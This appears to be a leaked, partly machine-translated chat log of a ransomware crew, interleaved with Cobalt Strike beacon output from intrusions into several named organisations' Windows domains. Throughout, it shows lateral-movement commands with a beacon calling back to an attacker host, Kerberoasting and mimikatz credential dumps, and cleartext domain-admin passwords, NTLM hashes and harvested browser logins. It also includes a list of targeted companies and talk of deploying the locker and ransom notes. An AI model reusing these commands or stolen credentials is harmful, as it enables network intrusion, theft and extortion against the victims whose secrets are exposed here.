[*] 10.100.7.14:139 - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 10.100.7.16:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3d 12h 33m 11s) (guid:{1466eec3-53c0-4eb4-af7e-1dabe2584051} (authentication domain:PVRT)
[+] 10.100.7.16:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-02) (authentication domain:PVRT)
``OK, the main thing is to check that all YES in hashdump 3941 in ad_user 3954ad users long opens now count the number of users in the domain? the client itself has hung? or session? after hashdump see if the coballstrike hung)
dcsync does not fit into the file ?
```
you could just do the hashdump on the idea, right? ``
C:{\WINDOWS\Temp> del eula.dll
C:WINDOWS/Temp\eula.dll
Access is denied.

C:\WINDOWS\Temp> whoami
friver\i3bdr

I don't think the skis are going wrong then use ntds utill should be here or not here ?from creds export@tl1 what is the syntax ? dcsync can't get into the file ?it's holding the process can't delete the fucking files
100666/rw-rw-rw- 139680 fil 2020-10-06 23:01:55 +0200 eula.dll
40777/rwxrwxrwx 0 dir 2012-06-25 19:57:03 +0200 hsperfdata_SYSTEM
100666/rw-rw-rw- 22101 fil 2020-10-06 23:37:06 +0200 mimikatz.log
``DK in the cob what? Have you got it up? Have you got it up on the grid on your compaNot understood the questionDo you need to get the system up there? OK, that was the original taskDa@tl1 let me first jump (run dll) on the DK, take the dsink, then look for a server, there are lots of options now?
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 01:02:30> shell dir \\SOLARWINDS\C$\Users
[*] Tasked beacon to run: dir \\SOLARWINDS\C$\Users
[+] host called home, sent: 254 bytes
[+] received output:
 Volume in drive \SOLARWINDS\C$ has no label.
 Volume Serial Number is B6E7-695C

 Directory of \SOLARWINDS\C$\Users

09/02/2020 02:07 PM <DIR> .
09/02/2020 02:07 PM <DIR> .
03/07/2016 10:54 AM <DIR> .NET v2.0
03/07/2016 10:54 AM <DIR> .NET v2.0 Classic
03/07/2016 10:54 AM <DIR> .NET v4.5
03/07/2016 10:54 AM <DIR> .NET v4.5 Classic
09/28/2015 10:52 AM <DIR> Administrator
04/29/2020 12:07 AM <DIR> azure_join@friver.local
03/07/2016 10:54 AM <DIR> Classic .NET AppPool
09/10/2018 09:26 AM <DIR> frtech
08/07/2020 11:23 AM <DIR> KGillisAdmin
06/25/2020 11:14 AM <DIR> mfinniganadmin
10/30/2018 02:20 PM <DIR> MsDtsServer120
10/30/2018 05:06 PM <DIR> MsDtsServer130
07/17/2018 09:52 AM <DIR> MSSQLFDLauncher
10/30/2018 02:20 PM <DIR> MSSQLSERVER
10/30/2018 02:20 PM <DIR> MSSQLServerOLAPService
02/18/2020 10:53 AM <DIR> pcrusieadmin
06/22/2015 03:10 PM <DIR> Public
10/30/2018 02:20 PM <DIR> ReportServer
06/15/2020 10:24 AM <DIR> rgoinsadmin
10/30/2018 02:21 PM <DIR> SQLSERVERAGENT
10/30/2018 05:22 PM <DIR> SQLTELEMETRY
10/30/2018 05:20 PM <DIR> SSASTELEMETRY
10/30/2018 05:06 PM <DIR> SSISTELEMETRY130
               0 File(s) 0 bytes
              25 Dir(s) 43,644,530,688 bytes free

``and the tolist show me C:\users of this serveraha ok + what's the dll? coba? ``dn:CN=SOLARWINDS,OU=Servers,OU=Corporate,DC=FRIVER,DC=LOCAL``
this is the serveri look for the serverdump the hashes))))) finally the toura` ``
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:54:55> shell net use X: \SOLARWINDS\C$ /user:FRIVER\i3bdr 7Fv(l7c5h)Pq
[*] Tasked beacon to run: net use X: \SOLARWINDS\C$ /user:FRIVER\i3bdr 7Fv(l7c5h)Pq
[+] host called home, sent: 280 bytes
[+] received output:
The command completed successfully.

``````
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:51:25> shell net user i3bdr /dom
[*] Tasked beacon to run: net user i3bdr /dom
[+] host called home, sent: 50 bytes
[+] received output:
The request will be processed at a domain controller for domain FRIVER.LOCAL.

User name i3bdr
Full Name i3brd Backup
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set ?10/?21/?2016 2:34:30 PM
Password expires Never
Password changeable ?10/??24/?2016 2:34:30 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon ??10/?6/?2020 5:51:26 PM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Deny_Share_access *CitrixVPNAccess
                             *Domain Users *SQL Administrators
                             *Domain Admins *Payroll-SQLAdmins
The command completed successfully.

``I'm so fucked up, I won't say it again.
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct07 00:48:15> jump psexec_psh DIV79-FS-01 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (regbest.com:443) on DIV79-FS-01 via Service Control Manager (PSH)
[+] host called home, sent: 214277 bytes
[-] Could not open service control manager on DIV79-FS-01: 1722
[-] Could not connect to pipe (\DIV79-FS-01\pipe\status_4d6): 53
[+] host called home, sent: 152 bytes
\DIV79-FS-01 \pipe_host sent 152 bytes) \Why are we here just for fun)\and check more YES after you take the hashes off the server as far as possible is not critical no processes YES no one has been here for a long time and the server is not a serverKhat?
	 * Username : i3bdr
	 * Domain : FRIVER
	 * Password : 7Fv(l7c5h)Pq
?`opaaa``
Members

-------------------------------------------------------------------------------
ADFS adminsolar ayoderadmin
azureadmin bhilladmin BlackStratus$
BNelsonAdmin chailadmin CRMadmin
cwilsonadmin datacubepro dpawlakadmin
FaxAdmin gkoontzadmin gzapataadmin
i3bdr jsteffenadmin KGillisAdmin
mfinniganadmin MSOL_43139b2cee97 pcrusieadmin
rgoinsadmin ScaleService
SCCM-01$ sccmadmin sonicwalladmin
veeambr vmadmin
``user3 mimic if only that was taken off what else? said that now will take off more only that was taken off or only that was taken off? this is not an answer) took off lehabyl or took off? only hashdump the rest was taken off? the car is old, do not check the creed` ``
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:30:06> shell net use X: \cor-crm-02.friver.local\C$ /user:cor-crm-02\Administrator Shotgun913
[*] Tasked beacon to run: net use X: \cor-crm-02.friver.local\C$ /user:cor-crm-02\Administrator Shotgun913
[+] host called home, sent: 112 bytes
[+] received output:
System error 384 has occurred.

You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747

``Now alexei will run the dll and continue the work if it works - I'll send it right away nea (managed to determine the pass from FaxAdmin ?Ok, now I will throw the ad infona citrix under sox - from there we call kmd and attract citra, I wonder where it will lead evenachivmentvector open `` ``
URL : http://citrixweb-01/Citrix/XenApp/auth/login.aspx
Username : tkennedy
Password : Forest5454#
``+`psinject 7288 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\hashes.txt -append -force -encoding UTF8 ``Why not, let it lie there the point of Invoke-Kerberos ?took+without admincount`execute-assembly Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes.txt````
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct06 18:52:54> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain FRIVER.LOCAL.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
ADFS adminsolar ayoderadmin
azureadmin bhilladmin BlackStratus$
BNelsonAdmin chailadmin CRMadmin
cwilsonadmin datacubepro dpawlakadmin
FaxAdmin gkoontzadmin gzapataadmin
i3bdr jsteffenadmin KGillisAdmin
mfinniganadmin MSOL_43139b2cee97 pcrusieadmin
rgoinsadmin ScaleService
SCCM-01$ sccmadmin sonicwalladmin
veeambr vmadmin
The command completed successfully.

``````
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct06 18:57:21> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain FRIVER.LOCAL.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
pcrusieadmin rgoinsadmin
The command completed successfully.

``````
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct06 18:58:27> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment

Members

-------------------------------------------------------------------------------
Administrator
FRIVER\Domain Admins
FRIVER/Local Desktop Administrators
FRIVER\teledata
FRTech
The command completed successfully.

``Everything, leave it as it is and just go to lpe and so ona dll delete or leave it ?keep working + not deleted+`C:\Users\tkennedy\AppData\Local\Microsoft\Office` - here the dll
`olkexplorer.officeUI.dll` - I'll call it `7 out.7z file.txt file2.txt file3.txt` thank you` 7z ?))See you all tomorrow, thank you all))restart the clientbut it[ ](https://mediaeveryone.com/channel/general?msg=ZF8QdG6YHpW3E5Q5h) that is hanging? More precisely teem server, probably hangs after lunch give more sessions@user1 once said that you need time to put the records on modules and vectors in order, before lunch can do this yesThe second command helps first from emeralmatherials.com?
Our sessions:hiDo they? 2 with the other2 with one teamaWe're 4 here with the second team yet?Good morning to allGood morningGood morningGood morningGreetings)See you soon) Well, on the 5th at 2 in the office) Thank you)) When all said)) Happy New Year)) Thank you) Likewise, and thanks for bearing all our zatupy, with the New Year, all the best and also more bonuses) Thanks) Also happy to work with you @tl2 and the guys in the office, very much from you learned. It was a hard year from all points of view, we went through all sorts of things with you and you have grown a lot since our first meeting, which I am very glad. Especially during the last month you have been working as close as possible and as a team. I am glad we are working together, I hope you will not lose this spirit in the new year. Congratulations to all of you on a happy new year! I wish you happiness, more bonuses, health and a good sleep for the weekend. Thank you all)Very fast and can go away)I will sum up the year in 2 hours)
https://wwhq62nas.us2.quickconnect.to/
https://waterway63.us2.quickconnect.to/
```
```
Waterway
11915Wnas2179!
``What time?'' Well it's also seen in GeneralWe're coming back on the 5th of the dayI @tl2 said that you came of your own accordThank you all for coming today
    WATERWAY\Quser pdiC1137qu!
    WATERWAY\Administrator 1853Gators
    WATERWAY\datavault Waterway727
    WATERWAY\domainrestore Waterway727
    WATERWAY\mapusatera Gators1853
    WATERWAY\veeam_admin 99Waterway
    WATERWAY\Applied Waterway99
    WATERWAY\DBunte Waterway99
    WATERWAY\gkeller Waterway76
    WATERWAY\SEnglert Waterway99!

    waterway\ssuser pdiC1137ssrs!
    WATERWAY\Fpuser pdiC1137fp!
    WATERWAY\U05 05Blues
```
```
us:
192.168.0.3
Waterway
11915Wnas2179!
````WATERWAY\blauer 11915Admin2179!
User: mapusatera - IP Address: 192.168.0.164
User: DBunte - IP Address: 192.168.90.2
User: gkeller - IP Address: 192.168.0.162
User: Quser - IP Address: 192.168.13.57


LEVASHENKO-PC: 192.168.0.22 mharper
WWSQL: 192.168.0.188 blauer
LAB-OFFICE: 192.168.0.161 Administrator

``and on this all-logins and passwords give separate information about tachka adminsladno so my versionda, i think the new version of ff changed the algorithm as i remember he did not give anything other than mosilla sharpweb kazhiz not workada sharpweb also pusilimozila they have noff separately goes edg new and chomon itself checks only browsers on the chrome engine sharpchromium all browsers you kste looked only chrome?but after the signal head-on that we're back more likely soon to redo everything they probably rolled back and scored their passwords 2-3 duplicates per YES) and as for passwords I would check their mail for starters as a variant daobvezti them keyloggers, or what ...paper to steal they go there through the network anywaywhy? well, we'll have to go to them then, hulino traces in any case is thereavlya not on the network accesses may be on the paper also if you think sohttp://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_GUI_Administration_Guide_NOS_50x.whz/unm1501525250368.htmlBy the way, they had folders restore - like from programs to restore deleted files. it's just a word that the accesses to the crash site will be fresh and they rolled back quickly after the first one and the grid goes on the second circle just to think about it after such a clear sign that the fight is not over they probably understand if the grid goes on the second circleHueeeeeeeew))) he probably decided to work from home, bastard)and like now burned him Sharphromium removed passwords, removed logopassword, in chrome handheld browsed the history. did you look for traces of nimble? did you read his mail?) the answer was no. did you check if he was using nimblebrowser or if he had a ms outlook client?I turned on the rdp on it, is there a car? did not find access to the mail have not looked? there is another option, on the synolodji put passwords blauer, perhaps on the nimbles, too, he too. and the logs that is backed up there, how many admins from nimbla group have you been? there only correspondence with the seller and the correspondence on the setting (dock, I've already thrown) there's also a maximum I followed @user7 found information from the pdf checked for these tags and nimbla looked for and saw the hostnamenimble) I was at the post of a few dudes, there on the subject
veeam, backup, pass, sphere, center nothing
I searched the mail with a few dudes about veeam, backup, pass, sphere, center blank. at most on the backup came out that i screenshot, about data stolen network hacked, and allThey probably all it department domain admins - not to get up twice)) and maybe in correspondence lit up something interesting he gets here `` ``
>displayName: Greg Keller
>uSNCreated: 17303
>memberOf: CN=Veeam Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=IT,OU=WW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=ITStaff,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Office,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OfficeSQL,OU=SQLGroups,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OnlyOffice,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Domain Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
but since he's a developer they have an internal portal, maybe you should still look there no keller is a developer. they have blauer not removed his access from the outlook? gkeller is 60% sure that this guy has access to the mail there so what's wrong with us with us
WATERWAY\U05
05Blues
``[ ](https://mediaeveryone.com/group/waterway-com?msg=DhHDNhcrjFT5CcYtP) where did you get this? ``05Blues``031bac9c9ef2cfcc9b630ab7fae8c0ed as well as the rootlintam still has an alert for temperature``
Message: Temperature sensor bp-temp1 on shelf AF-180176 at left-side backplane is 33 Celsius. Check air temperature and air flow around the array.
````https://wwhq62nas.us2.quickconnect.to/ ``the rdp port is open the rest is nottpio writes login was from this ipai ask what the rdp know) ``ww-nimble-01 `` is the nibble which is 192.168.0.75 what do we have here?
127.0.1.2:3389
``````
Time: Wed Oct 7 10:58:43 2020
Type: 14806
ID: 13472
Message: Root login to controller A from 127.0.1.2 succeeded.

Group Name: Group1
Array name: ww-nimble-01
Serial: AF-180176
Version: 4.5.2.0-553085-opt

Arrays in the group:
---------------------+-----------------+-----------+----------------
Name Serial Model Version
---------------------+-----------------+-----------+----------------
ww-nimble-01 AF-180176 CS1000 4.5.2.0-553085-opt


CONFIDENTIALITY NOTICE: The materials enclosed with this email transmission are private and confidential. The information contained in the material is privileged and is intended only for the use of the individual(s) or entity(ies) named above. If you are not the intended recipient, be advised that unauthorized use, disclosure, copying, distribution or the taking of any action in reliance on the contents of this emailed information is strictly prohibited. If you have received this email transmission in error, please notify the sender immediately by return email, delete this communication and destroy all copies.
``cloudy?``https://192.168.63.30:5001/`` - same us` ``https://waterway63.us2.quickconnect.to/` - 1 more us``1Vanilla2` give password 096d6208ddf94d8e3fcf87e3e1aa1ebf``
192.168.0.3
Waterway
11915Wnas2179!
``````
--- Chromium Credential (User: blauer) ---
URL :
Username : waterwayapps@gmail.com
Password : 2Vanilla1

--- Chromium Credential (User: blauer) ---
URL : https://auth.vantiv.com/openam/UI/Login
Username : blauer@waterway.com
Password : 11915Iq2179!

--- Chromium Credential (User: blauer) ---
URL :
Username : blauer@waterway.com
Password : 11915Gi2179!

--- Chromium Credential (User: blauer) ---
URL : https://www.serversupply.com/process_order4.asp
Username : blauer@waterway.com
Password : 11915Ss2179

``````
LEVASHENKO-PC: 192.168.0.22 mharper
WWSQL: 192.168.0.188 blauer
LAB-OFFICE: 192.168.0.161 administrator
``No luck? and mail the hostname ``ww-nimble-01``1Vanilla2 ``but there is a client installed check the installed software else``
WATERWAY\gkeller Waterway76
``````
192.168.0.162:3389
if the service is off do you turn it on? if the service is on do you turn it off do you turn it on why do you say the rdp does not let techies in?
21 ftp
22,23 ssh, telnet
80,443 http, https
5900 VNC
3389 Microsoft Terminal Server (rdp)
5631,5632 pcAnywhere
445,1433 MS-SQL Server
3306 MySQL
1521,2483 Oracle
5432 PostgreSQL
5938 nbvdm.th
7199 JMX monitoring port
7000 inter-node cluster
7001 SSL inter-node cluster
9042 CQL Native Transport Port
9160 Thrift DataStax OpsCenter
61620 opscenterd daemon
61621 Agent
8888 Website
1-30,80,443,5900,3389,5631,5632,445,1433,3306,1521,2483,5432,5938,7199,7000,7001,9042,9160,61620,8888,61621
``By the way, here's an addition to the port
0.1:5432") shows that PostgreSQL is listening only for connections originating from the local computer, so we will have to edit the
My mistake.
pcAnywhere was a suite of computer programs by Symantec which allows a user of the pcAnywhere remote program on a computer to connect to a personal computer running the pcAnywhere host if both are connected to interconnected networks and the password is known
``````
PCAnywhere uses ports 5631 (Data port or Transmission Control Protocol [TCP]) and 5632 (Status port or User Datagram Protocol [UDP]) to communicate
``you know what this is?)``192.168.0.75:5432````
192.168.0.75:5432
192.168.0.75:443
192.168.0.75:80

[+] received output:
192.168.0.75:22 (SSH-2.0-OpenSSH_7.4)
Scanner module is complete
``Please pay attention to 2http/chttp what scheme are you connecting to?
    https://192.168.0.42
    https://192.168.0.43
    https://192.168.0.75
    https://192.168.0.77
``what ip?'' No rdp on nimblenet too
User: gkeller - IP Address: 192.168.0.162
``No rdp[ ](https://mediaeveryone.com/group/waterway-com?msg=FBXc3Z2B6XvwaGuKW) here, what's the IP?
WATERWAY\mapusatera Gators1853
``````
  CurrentUser : WATERWAY\mapusatera
  Idletime : 01h:54m:23s:531ms (352463531 milliseconds)
``172.17.112.1 as I understand the pdf says that they are from the AD check only idletimevariant good and from there to chekatmb to them on RDP go to the thing about the Guy nimbala I have on all tacts several IP inputs as I understand + you on the same ip go?[I have a few different ways to get to him, but I don't know how to get to him.
gkeller 134cee9671bb94bffdaefb6f84f5989d
Now that's interesting.
dn:CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>objectClass: top
>objectClass: group
>cn: Nimble Admins
>member: CN=Brandon Lauer,CN=Users,DC=waterway,DC=com
>member: CN=Dianne Jarden,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>member: CN=appliedgroup,OU=Special Users,OU=Corporate,DC=waterway,DC=com
>member: CN=Greg Keller,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>member: CN=Mark Harper,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>member: CN=Mike Pusatera,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>member: CN=Administrator,OU=Special Users,OU=Corporate,DC=waterway,DC=com
```
```
blauer
djarden
gkeller waterway76
mharper
mapusatera Gators1853
Administrator 1853Gators
the same with ssx similarly doyten you do not go through rdp via proxy any manipulations with the network are done through a dedik as rdp ssx skl web and so on you still dedik for that, do you connect to the network through ssx proxy?) to sum it up: use vince for testing ssx accesses with vince also happens, but rarely. in more serious systems on the same level as the current date of connection will hang an error that there was a failed attempt to enter on such and such a day from such and such a path during authorization successful afterwards just if through ssh directly fixed message in the log getsthere is already experience)do not knowhough here, about whether a failed password gets into the log during copying via sabinet - here I will not argue))) I know, constantly use. Not winSCP though, but the usual linux one. but underneath both Ibsch is not pure ssh
WinSCP supports five transfer protocols: SFTP (SSH File Transfer Protocol); FTP (File Transfer Protocol); SCP (Secure Copy Protocol);
Can sshp help? It's the same ssh under the hood, but proxies don't help.
a) you can fuck up your password at least, and this message about failed logon the next time you log on to SCP
b) the alerts to your email
c) Login by proxy proxy proxy so we are through proxy. and I have not heard about vincezp...for the simple reason that if you catch a wrong password you will not leave a passchalk in the form of logs at the login accesses are tested ONLY WITHIN vincezp do not forget```
WATERWAY\Applied Waterway99
``````
local-user admin class manage
password hash
$h$6$yUYGy+aaZlXJHmJn$E6qtQR7QVSx4y2M5eR2N3o6luDGdCZ5iXdLn1a5qGEO/pXQo7Qo2tynxcjVzbNiH2IsvDgEKeye
H2W6DyHkJDA==
service-type telnet http https terminal
authorization-attribute user-role network-admin
authorization-attribute user-role network-operator
#
local-user applied class manage
password hash
$h$6$hKewp2sE1Ks4S7TF$/ymqDpm46U4XCP9njU4FMbDOxm9Gwnk0oC7ScVyhFSwKIn7M42+gfjHGOBIVAtfM1J5tvL3U
xKW4isDfXhCjpw==
``What do you know now about the usefulness of the mail) at the post office admins - where? there is a doc with the settings on the mail screenshot? 22roottakoy and only such and only such ashhostnamevbibee ip on the request backup issued takoene then read))) and procheck passwords through mail can transfer keys if we nimbly get in, what's the point of mail?why should mail have priority or look for a separate tool on git[ ](https://mediaeveryone.com/group/waterway-com?msg=FqeuTwcmZRLrWvD5L) why should mail have priority?
URL : https://mail.datotel.com/
Username : jboden@waterway.com
Password : Moose1234!
``nimbles has ssh, but it's keyed. what can i do to get the creds off putty? user9https://www.stellarinfo.com/article/export-exchange-2010-mailbox-to-pst.php``
Username : Administrator
Domain : ALLOY
Password : j@mez9olk
``Trying to log in to the ehas under dudes that have ``ou=Exchange Administrative Group`` with mailsniper, rumor has it that it doesn`t work[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=aw69Bm6w9zALkpsCB) went to the exh server, opened the exh shell, it fell out with this oneilsniper?
WARNING: No Exchange servers are available in the Active Directory site Suzhou. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site France. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Indy. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Orange. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site VA. Connecting to an Exchange server in another
 Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Singapore. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Crocket. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Mexico. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Germany. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Ohio. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site WI. Connecting to an Exchange server in another
 Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Henderson. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Nevada. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Poland. Connecting to an Exchange server in
Another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Suzhou. Connecting to an Exchange server in
WARNING: Connecting to an Exchange server in another Active Directory site.
VERBOSE: Connecting to Exchange.rtpco.local.
``````
Username : arobinsona
Domain : RTPCO
Password : Passw0rd!

Username : O365Service
Domain : RTPCO
Password : Password1!
``If we've done what we can do, why wait for him to write ``.
 Trend breaks the locker, not the note, but now it also breaks the tht, that's why it doesn't leave a note
it's better to wait for mana

``I'm not sure if it's all encrypted there, so unscramble it and fuck with their heads.)
Or make a file with a different name and content slightly tampered with.What about the note if the locker worked ok? mostly kerbs no attention or 1-2 networks maxrode nigdea tell me where the NTDS dumped there ``
bigassfans.com fishusa.com healthcare.com mgrmedu.com telecomlabsinc.com
bnpmedia.com forestriverinc.com holzerford.com netease.com unf.edu
cpcc.edu globaltranz.com humboldt.edu oasispetroleum.com vpinc.net
desire2learn.com gpj.com mapciasp.com orenco.com zohocorp
epcusa.com happay.in matchesfashion.com snpartners.com

I can't find my build on my hardcodile triad just psh doesn't work) there's a guy who "rules" it out there
and please give me a .net shairfinder will you take it? i'll brougt the vpnotscan sabiki find adr? ok i'll give all vpnos to work for it already
there's one on backdoor
triadmetals
alloypolimers
ballymoregroup
how much? they said you have the grids? tomorrow's boot? yes please clean out the dead sessions there yes? no need, i already ordered it, i just want to test it today on some and this one will do fine1 i can give you a fresh one i ordered 3 for the boot i can give you the old one, it's the one wilson lochy
you ordered a new one for you already the old one? cause the old one) i thought you flooded it aaa ok give it to @user4 i can work on it? you do not use this server? 104.194.10.161ARCHIVE.loomisco.com yes, extended, please```
loomisco.com\EDIADMIN:APPSYS
loomisco.comShutdown:p3bk@c1
loomisco.com/Omiller:Angela327!
``I'll write a full report with commands or only the steps? Immediately report as found@tl1 @tl2Keach such error reduces the number of remaining authorization attempts before the account is blocked.
ERROR: Logon failure: unknown user name or bad password.
``````
beacon> net share
[*] Tasked beacon to run net share on localhost
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \localhost:

 Share name Comment
 ---------- -------
 ADMIN$ Remote Admin
 C$ Default share
 F$ Default share
 IPC$ Remote IPC
 Scan_Data

``````
beacon> net logons
[*] Tasked beacon to run net logons on localhost
[+] host called home, sent: 104506 bytes
[+] received output:
Logged on users at \localhost:
[+] received output:
Loomisco\Backupuser
SCANSTORAGE\Backupuser
Loomisco\Backupuser
LOOMIS\SCANSTORAGE$
``loomisco.com
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
loomisco.com
``````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:78fe7f8e8140a38ea3886cccd4cb0a19:::p3bk@c1
````Loomisco\Backupuser ASdnmxcsdf@#d````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:78fe7f8e8140a38ea3886cccd4cb0a19:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SophosSAUSCANSTORaaa:1005:aad3b435b51404eeaad3b435b51404ee:546026a5bc5721ea345185056d7e21c1:::
``````
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 TLCDC1 192.168.0.192
 TLCDC2 192.168.0.222
``user9files won't fly (sextg@tl1``)
CORP\jvelazquezg 956e44f5069e8f0161ea7064840894ff
CORP\Rflores 3e33c0155d517e77ad1a4040c9ed4e45
CORP\lvegar 06ca20732bea98870c93d29a2b31e783
FILIAL\Anavarretea 5cb20c880326791e424fc9f2554ae9b4
CORP\evazquezpr 288c03a4543cf46d0a665df89f1b8a3d
```
I managed to get the hashes down.
Teemo[SFE18491]Hgutierreze/792560|2021Jan28 20:51:16> shell tasklist /v /s CORPKIOVDAPGM01.corp.televisa.com.mx
[*] tasked beacon to run: tasklist /v /s CORPKIOVDAPGM01.corp.televisa.com.mx
[+] host called home, sent: 82 bytes
Nombre de imagen PID Nombre de sesión Núm. de ses Uso de memor Nombre de usuario Tiempo de CP
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 4 KB NT AUTHORITY\SYSTEM 1600:47:50
System 4 Services 0 256 KB N/D 3:39:06
smss.exe 1340 Services 0 1,052 KB NT AUTHORITY\SYSTEM 0:00:01
csrss.exe 1452 Services 0 4,724 KB NT AUTHORITY\SYSTEM 0:00:42
wininit.exe 1524 Services 0 4,152 KB NT AUTHORITY\SYSTEM 0:00:00
services.exe 1616 Services 0 14,012 KB NT AUTHORITY\SYSTEM 0:02:46
lsass.exe 1660 Services 0 60,944 KB NT AUTHORITY\SYSTEM 0:27:11
svchost.exe 1752 Services 0 22,616 KB NT AUTHORITY\SYSTEM 0:06:03
svchost.exe 1784 Services 0 14,632 KB NT AUTHORITY\NETWORK SERVICE 0:03:50
svchost.exe 1900 Services 0 25,576 KB NT AUTHORITY\LOCAL SERVICE 3:10:52
svchost.exe 1916 Services 0 91,696 KB NT AUTHORITY\SYSTEM 2:50:25
svchost.exe 1940 Services 0 18,528 KB NT AUTHORITY\LOCAL SERVICE 0:01:21
Citrix.Wem.Agent.Service.     1996 Services 0 135,548 KB NT AUTHORITY\SYSTEM 0:12:47
svchost.exe 1412 Services 0 73,540 KB NT AUTHORITY\SYSTEM 3:24:01
Citrix.Wem.Agent.LogonSer 1188 Services 0 26,320 KB NT AUTHORITY\SYSTEM 0:00:02
svchost.exe 1608 Services 0 23,080 KB NT AUTHORITY\NETWORK SERVICE 0:10:18
CtxPvDSvc.exe 1180 Services 0 7,976 KB NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1404 Services 0 28,256 KB NT AUTHORITY\SYSTEM 0:00:34
UserProfileManager.exe 2068 Services 0 15,532 KB NT AUTHORITY\SYSTEM 0:05:52
svchost.exe 2184 Services 0 9,100 KB NT AUTHORITY\LOCAL SERVICE 0:00:05
svchost.exe 2236 Services 0 16,064 KB NT AUTHORITY\LOCAL SERVICE 0:00:21
PvsVmAgent.exe 2268 Services 0 6,068 KB NT AUTHORITY\SYSTEM 0:00:00
BNDevice.exe 2388 Services 0 11,816 KB NT AUTHORITY\SYSTEM 0:00:00
spoolsv.exe 2544 Services 0 77,740 KB NT AUTHORITY\SYSTEM 0:39:24
armsvc.exe 2584 Services 0 6,768 KB NT AUTHORITY\SYSTEM 0:00:00
BrokerAgent.exe 2712 Services 0 136,640 KB NT AUTHORITY\NETWORK SERVICE 0:15:24
CdfSvc.exe 2820 Services 0 7,636 KB NT AUTHORITY\NETWORK SERVICE 0:00:00
encsvc.exe 2860 Services 0 6,972 KB NT AUTHORITY\LOCAL SERVICE 0:39:29
CseEngine.exe 2948 Services 0 1,081,368 KB NT AUTHORITY\SYSTEM 4:51:34
ctxrdr.exe 3004 Services 0 7,360 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
